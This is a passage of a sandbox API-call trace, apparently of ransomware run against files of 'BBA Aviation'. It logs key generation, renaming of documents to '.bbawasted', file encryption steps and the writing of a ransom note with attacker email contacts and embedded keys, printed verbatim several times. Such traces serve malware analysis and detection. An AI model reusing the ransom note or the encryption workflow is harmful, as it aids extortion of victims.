DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]V8+jvg4skYetMKGwXiPquNVVJF+KjjsTwgJHn1R7vslYMvaqnoAfxmFPKFbjgBDJ\r\nDuIMeLqP/pCkX5UANsa8UyaxPZ8x+fPTomE34JRifXJsT35EqqoVg1CJjBBhq7XJ\r\njYvxhuGbPylfuRYlSRNYKPxbeJyiXytEjLYUZC2+uRfAIgxnTjWaV8T01VyMrs4z\r\nLFmmoPNzwGPDE5h9V08sLfsUi/5SRhrYO5V7qZifdvdzSU28eOA4FKmXCU7a1Q5G\r\n1ETmFSRbIVGkjboMzQOihXRCq9wqC4NQGh4UsOkm8mqUrJxF8EYArfJYC/LCFSdE\r\ng/7auFGfBR+MizSIFu3kODyfjLyYzKQUpFKpw+lkRdpIDev4977MM6XgLfjKCSHG\r\n/deZuQFkDq86S22DmGrOHqqbaghTmxO9m1Y4kgvlhpFZsu0wha9ckmcWC01Di+EL\r\npFNpQYSrURHA0sI9DFfvj7vuL/ucywCHNJ1sEE8YN4wy6SkCXFwPWb3uPbTZS82p\r\nwS2JtSiVhYmJfIPFlKqmsSzPk+J3XLoZjFN69wmUyoJBKPISzfJ8pQpnDztWjbx6\r\n4kOoCHv90d7CcH4HMoChCguPahmssYZ8hxbDhjaU1RRvXlkvn4YQj8lQTSXV6IR/\r\nTg8Hr9kJu5ZiQw3CVT4t633Q47QT50Agjbao6F4jTHg=[end_key]\r\nKEEP IT\r\n") returned 984 [0216.705] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0216.705] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0216.705] SetEndOfFile (hFile=0x280) returned 1 [0216.708] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0216.708] CloseHandle (hObject=0x280) returned 1 [0216.708] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0216.708] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b01a0 | out: hHeap=0x660000) returned 1 [0216.709] _aulldvrm () returned 0x0 [0216.709] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a61b8) returned 1 [0216.709] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0216.709] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0216.709] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\AblJA-vBUHT4J0y0OEyd.pdf") returned 68 [0216.709] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x292) returned 0x6c4b88 [0216.710] lstrcpyW (in: lpString1=0x6c4c10, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0216.710] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0216.710] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6a38) returned 1 [0216.710] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0216.710] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0216.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\AblJA-vBUHT4J0y0OEyd.pdf.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\juwriqhh\\ablja-vbuht4j0y0oeyd.pdf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0216.711] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0216.713] SetEndOfFile (hFile=0x280) returned 1 [0216.713] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0216.713] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0216.713] lstrcpyW (in: lpString1=0x6c4c10, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0216.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\AblJA-vBUHT4J0y0OEyd.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\juwriqhh\\ablja-vbuht4j0y0oeyd.pdf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\AblJA-vBUHT4J0y0OEyd.pdf.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\juwriqhh\\ablja-vbuht4j0y0oeyd.pdf.bbawasted")) returned 1 [0216.714] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\AblJA-vBUHT4J0y0OEyd.pdf.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\juwriqhh\\ablja-vbuht4j0y0oeyd.pdf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0216.714] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0216.715] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x14ed8 [0216.715] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14ed8) returned 0x5f0000 [0216.715] CloseHandle (hObject=0x294) returned 1 [0216.718] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0216.719] CloseHandle (hObject=0x290) returned 1 [0216.719] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0216.719] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6818) returned 1 [0216.720] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0216.720] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0216.720] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6bd0) returned 1 [0216.720] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0216.720] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0216.920] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0216.920] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0216.920] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0216.920] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]PzWkkWmjtF3oKT0oIqM2WJ8PhglPHEhW5rTG2H/RwOW1qReYJ05ywjS18S+l6SV9\r\n8mVolfZsBRE8ThqLEA11AdhLhkzbY1VB1cJ8v2NL69ft3q/5W52ZhSChcSlucE1s\r\n1G0Lc23T7WtE2HVl0o8pU5zcijvEZ+lE/go+BJy6eZQdKATbOXIxl+6wRS8SgLa3\r\nIFd10movHZIEpPtoE5oQvUbALAB7+8SDijmnnXEM1UQYTk8KrohaPZHG/nZcuLFV\r\nDcZ+sIi1R0UBw97u7nq6HCHuZpuItoeqLYiicIzDgaLVCeWuau4Pvbn//Z0VSh5p\r\nVoOTZEtlvDV/2BLoZdJwqdSU8wDSKn4lsOoDDe6D19bYiG590uUtGMLf6t1GaHW8\r\n8vEN8hCoJmVlj5fparHBl1JUZRvFE7mnqpXSk4lMLVEGOSm/+JPwAH7bdfxiv+//\r\nXtnpYhsUzk9ZchIUEw9BS/GnjH968jO9176X3WvUIpThCPAXr6PPbk1cdvnEv1or\r\nY5fbhqE+bcy0HFcaRG17g7Zn4xBUbX1bNYyxBgw8MVsIrgTUeG8YOB0c7QVS9PSn\r\nhnxZ2zcviThvRGSUKvVWFGaT3XE7loarsFYV/K5SAuQOex6C/RLO3nXAelunIOWd\r\nOD/tCvrGUWVyOYVNLBTElf59i6E4P6//9tHzQBNfZtV=[end_key]\r\nKEEP IT\r\n") returned 984 [0216.920] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0216.920] WriteFile (in: hFile=0x280, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0216.920] SetEndOfFile (hFile=0x280) returned 1 [0217.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0217.473] CloseHandle (hObject=0x280) returned 1 [0217.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0217.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b65b8 | out: hHeap=0x660000) returned 1 [0217.473] _aulldvrm () returned 0x0 [0217.473] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6570) returned 1 [0217.474] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0217.474] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0217.474] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\hchZ_v_GvoqV_Q.ots") returned 61 [0217.474] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x284) returned 0x6b6398 [0217.474] lstrcpyW (in: lpString1=0x6b6412, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0217.474] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0217.474] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6460) returned 1 [0217.474] CryptGenRandom (in: hProv=0x6a6460, dwLen=0xa3a, pbBuffer=0x6a8fa8 | out: pbBuffer=0x6a8fa8) returned 1 [0217.474] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0217.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\hchZ_v_GvoqV_Q.ots.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\hchz_v_gvoqv_q.ots.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0217.475] WriteFile (in: hFile=0x280, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0217.476] SetEndOfFile (hFile=0x280) returned 1 [0217.477] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0217.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0217.477] lstrcpyW (in: lpString1=0x6b6412, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0217.477] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\hchZ_v_GvoqV_Q.ots" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\hchz_v_gvoqv_q.ots"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\hchZ_v_GvoqV_Q.ots.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\hchz_v_gvoqv_q.ots.bbawasted")) returned 1 [0217.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\hchZ_v_GvoqV_Q.ots.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\hchz_v_gvoqv_q.ots.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0217.478] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0217.478] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x10518 [0217.478] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10518) returned 0x5f0000 [0217.478] CloseHandle (hObject=0x28c) returned 1 [0217.480] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0217.481] CloseHandle (hObject=0x294) returned 1 [0217.481] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0217.481] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6b48) returned 1 [0217.482] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0217.482] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0217.482] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a68a0) returned 1 [0217.482] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0217.482] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0217.491] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0217.492] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0217.492] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0217.492] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]sAUp1DJ2R5AUT1hLQTu8tQKwIdfFmqcwz9T4nhw0jy6MsU9uUGvGS97w+REn7+Ia\r\ncR0peHINfb3BfcJKnNfSSQK8AOphZ60ZBPDWPKczlja4AzyMAPV3WVZtdB4sd9hM\r\n1ee8IEvuN4EGMZaMz7Y6C+SrFQqB2LrnoeRBG8O67Ru70O6sKtYzvo+vqHajlnOW\r\nw1L2c3wY2Bx9yT6e5X9XayXeUDd5DNUCl42qkN1/2Wodb7D1vU/MB7wyZ4qx/zpI\r\ncm+Tg/uV5lenPfKlmvP91fkdwEo1h+riRj2cb+Vh8hpPbUiv8QeEBxrjl1RjTP1i\r\nWmBBZcsaaJkdt42IROjMu60ZzFtJZ9XMXfWO/nDVG72GKPRt1vUEvuqNSIH2vWYT\r\nWM5gKvh2Rs/nz8Q4zkilKdC9yjd9HnS1AF1KLU4SwO86oZxB0a69zCP5p1fbJadM\r\nRfM1HWYjG4RaTpF87Hau3KL0L9gt3T/bIrf6HdXUqrjVSulPS7ckQ3AKatyuRcV3\r\n3Xj+4paYthVi4gA9N3uIGV3GDg/DGGGY1hS4cFt4zc7a9fzHfmH4CqTWjSzHPzyD\r\nojTo77/ddjRXrAsK7CTqS5OrGDgHG8ElQPAJwZqbFe9aucXpfxLZcmh133FAvSUw\r\nTzNLquV5QVEr9hQHv9p6JHpWnma1O+YKt+BTeJcdyCM=[end_key]\r\nKEEP IT\r\n") returned 984 [0217.492] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0217.492] WriteFile (in: hFile=0x280, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0217.492] SetEndOfFile (hFile=0x280) returned 1 [0217.494] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0217.494] CloseHandle (hObject=0x280) returned 1 [0217.494] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b6398 | out: hHeap=0x660000) returned 1 [0217.495] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8410 | out: hHeap=0x660000) returned 1 [0217.495] _aulldvrm () returned 0x0 [0217.495] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6570) returned 1 [0217.495] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0217.495] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0217.495] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\ldVb8H15c1gs1E7qc3nu.odp") returned 67 [0217.495] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x290) returned 0x6b6398 [0217.495] lstrcpyW (in: lpString1=0x6b641e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0217.495] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0217.496] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6460) returned 1 [0217.496] CryptGenRandom (in: hProv=0x6a6460, dwLen=0xa3a, pbBuffer=0x6a8fa8 | out: pbBuffer=0x6a8fa8) returned 1 [0217.496] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0217.496] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\ldVb8H15c1gs1E7qc3nu.odp.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\ldvb8h15c1gs1e7qc3nu.odp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0217.497] WriteFile (in: hFile=0x280, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0217.498] SetEndOfFile (hFile=0x280) returned 1 [0217.498] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0217.498] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0217.498] lstrcpyW (in: lpString1=0x6b641e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0217.498] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\ldVb8H15c1gs1E7qc3nu.odp" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\ldvb8h15c1gs1e7qc3nu.odp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\ldVb8H15c1gs1E7qc3nu.odp.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\ldvb8h15c1gs1e7qc3nu.odp.bbawasted")) returned 1 [0217.499] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\ldVb8H15c1gs1E7qc3nu.odp.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\ldvb8h15c1gs1e7qc3nu.odp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0217.499] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0217.499] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xda13 [0217.499] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xda13) returned 0x5f0000 [0217.499] CloseHandle (hObject=0x294) returned 1 [0217.501] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0217.502] CloseHandle (hObject=0x28c) returned 1 [0217.502] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0217.502] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6680) returned 1 [0217.502] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0217.502] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0217.503] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a61b8) returned 1 [0217.503] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0217.503] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0217.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0217.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0217.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0217.826] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]JgjKPkqgjys5IDaRIfb2E7yj6al0jEhkCrYZVcWCPOQvWBndkNlF4XucRSjtOK0g\r\nB7FVpW61DziUDhTw9UwVzUqij2WqPohPdCPbn8jruNYxzXwF8nyHyrYPdctvEJKw\r\n0G/YEUpMNNZkJSFIKHN/5wG/08vsww9RTnHGw9oZK5KwmDYS4/ogVgTR/Fnzq8PR\r\nFng2elVRlmfGJz4ArKZTE0ywMznoehNOUFinM3yqA38SP7rL1ZsXAZga+oV3jNS/\r\nbUWBMHxAi3Np72eo+vQAOgE4xV0OEysmTpz18Cgmhz/aWOVDY0YJCkCRvy2VYPWh\r\nFJEV0DWBKcKytFIu0zHtwhFxfOTnWyHKqfRqDyYEOFY0HDwxLtmLiUodDRQ9tQS2\r\nUnbt323iZZyhvQb2s31p/NF0oH93lDL12VtDlF0p4xBGH4aLeiABONfOob6uadKM\r\nf9f+SHJSQWRmZGYeVxn4AwsOYMaPaRIIGqXM9sTvHPnQSmygBZB5ytPheUYsVQT7\r\n670zCajXr+EqgVp7sgEtz1Ey696MQjOAtfY7JX13tIfkzD3UrFlqWGbkrYMQkUbN\r\ndJAz4vBNU24aktq4lxNcQxP9+NcwC3CXQsYUs57YxnQOh5qYuzOIu6EByBShRNny\r\nWJOKtKE7e8H5ES0gs+ayqBSATT/eVEIbapKrbH7pN+L=